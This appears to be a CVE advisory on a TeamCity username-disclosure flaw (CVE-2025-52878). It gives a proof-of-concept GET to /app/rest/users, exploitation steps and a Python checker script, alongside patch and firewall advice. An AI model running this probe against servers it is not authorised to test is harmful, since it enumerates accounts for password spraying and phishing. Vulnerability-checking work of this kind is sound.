How the CVE Works
CVE-2025-52878 is an information disclosure vulnerability in JetBrains TeamCity versions before 2025.03.3. Because of insufficient permission checks on user-listing functionality, usernames are returned to accounts that are not authorised to see them: a low-privileged user can read user metadata that should be restricted, either through the REST API's user endpoints (the PoC below uses /app/rest/users) or through user-enumeration features of the web UI. A list of valid usernames does not compromise the server by itself, but it removes the guesswork from follow-on attacks such as password spraying, credential stuffing and targeted phishing.
DailyCVE Form:
Platform: JetBrains TeamCity
Version: < 2025.03.3
Vulnerability: Information Disclosure
Severity: Medium
Date: 06/25/2025
Prediction: Patch by 07/10/2025
What Undercode Says
Check the TeamCity version (the server build is reported in the version attribute of /app/rest/server; the original /api/version path is not a TeamCity endpoint):

    curl -s -H "Accept: application/json" http://<target>/app/rest/server

Exploit PoC (unauthorized username dump):

    GET /app/rest/users HTTP/1.1
    Host: <target>
    Accept: application/json
How to Exploit
An attacker holding a low-privileged TeamCity account (or, on a server that answers REST requests without authentication, no account at all) sends a plain GET to `/app/rest/users` or a similar user-listing endpoint and reads the username attributes out of the response; no crafted payload is needed, the check that should have rejected the request is simply missing.
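The version check and the username probe above, combined into one script. This is an added example, not code from the original page or from JetBrains. It assumes the fixed release is 2025.03.3 (from the advisory), that the server version is read from the version attribute of /app/rest/server, that /app/rest/users returns a JSON object with a "user" array when the caller is allowed to list users, and that Basic-auth requests go through the /httpAuth/ prefix; the SAMPLE_* bodies are constructed test data, not captured from a real server.

```python
"""Vulnerability check for CVE-2025-52878 (TeamCity username disclosure).

Added example; not part of the original page and not JetBrains code.
Assumptions: fixed version 2025.03.3 (advisory), server version read from
/app/rest/server, username list read from /app/rest/users, Basic auth via
the /httpAuth/ prefix. SAMPLE_SERVER_JSON and SAMPLE_USERS_JSON are
constructed test data for offline use.
"""
import base64
import json
import re
import sys
import urllib.error
import urllib.request

FIXED_VERSION = (2025, 3, 3)  # first release the advisory lists as fixed

# Constructed sample responses (shape follows TeamCity's REST JSON
# representation; the values themselves are made up).
SAMPLE_SERVER_JSON = '{"version":"2025.03.2 (build 186593)","buildNumber":"186593"}'
SAMPLE_USERS_JSON = (
    '{"count":2,"href":"/app/rest/users","user":['
    '{"username":"admin","name":"Administrator","id":1,"href":"/app/rest/users/id:1"},'
    '{"username":"ci-bot","name":"CI Bot","id":2,"href":"/app/rest/users/id:2"}]}'
)


def parse_version(version_string):
    """Turn '2025.03.2 (build 186593)' into (2025, 3, 2); a missing third
    component such as '2025.03' counts as 0."""
    m = re.search(r"(\d{4})\.(\d{1,2})(?:\.(\d+))?", version_string)
    if not m:
        raise ValueError("unrecognised TeamCity version: %r" % version_string)
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0))


def is_affected(version_string):
    """True when the reported version is older than the fixed release."""
    return parse_version(version_string) < FIXED_VERSION


def server_version(server_json):
    """Extract the version attribute from a /app/rest/server JSON body."""
    return json.loads(server_json)["version"]


def usernames_from_users_response(users_json):
    """Collect the usernames in a /app/rest/users JSON body. An HTTP 403 or an
    empty 'user' list means the caller was (correctly) denied."""
    data = json.loads(users_json)
    return [u["username"] for u in data.get("user", []) if "username" in u]


def fetch(base_url, path, credentials=None, timeout=10):
    """GET base_url+path and return (status, body). With credentials of the
    form 'user:password' the request uses /httpAuth/ and Basic auth."""
    url = base_url.rstrip("/") + ("/httpAuth" if credentials else "") + path
    req = urllib.request.Request(url, headers={"Accept": "application/json"})
    if credentials:
        token = base64.b64encode(credentials.encode()).decode()
        req.add_header("Authorization", "Basic " + token)
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")


def main(argv):
    """Usage: check.py http://<target> [lowpriv_user:password]
    Exit 0 when the probe is denied, 1 when usernames leak or the server
    cannot be reached, 2 on bad arguments."""
    if len(argv) < 2:
        print("usage: %s http://<target> [lowpriv_user:password]" % argv[0])
        return 2
    base, creds = argv[1], (argv[2] if len(argv) > 2 else None)
    status, body = fetch(base, "/app/rest/server", creds)
    if status != 200:
        print("could not read server version (HTTP %d)" % status)
        return 1
    version = server_version(body)
    print("server version %s -> %s" % (version, "AFFECTED" if is_affected(version) else "fixed"))
    status, body = fetch(base, "/app/rest/users", creds)
    names = usernames_from_users_response(body) if status == 200 else []
    print("/app/rest/users -> HTTP %d, %d username(s) returned" % (status, len(names)))
    return 1 if names else 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Run it once with a deliberately low-privileged account (a project viewer, for instance) and once with no credentials; a 403 or an empty list on both runs is the expected result on a patched server, while a populated list from the low-privileged account reproduces the disclosure the advisory describes.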
Protection from this CVE
- Upgrade to TeamCity 2025.03.3 or later; this is the only fix for the missing permission check itself
- Until then, restrict network access to the server and its REST API with firewall rules; note that this limits exposure to outsiders but does nothing against a low-privileged account that already exists on the server
Impact
Exposed usernames enlarge the attack surface: a confirmed list of valid accounts lets an attacker skip enumeration and go straight to password spraying, credential stuffing or targeted social engineering against named users.
Sources:
Reported By: nvd.nist.gov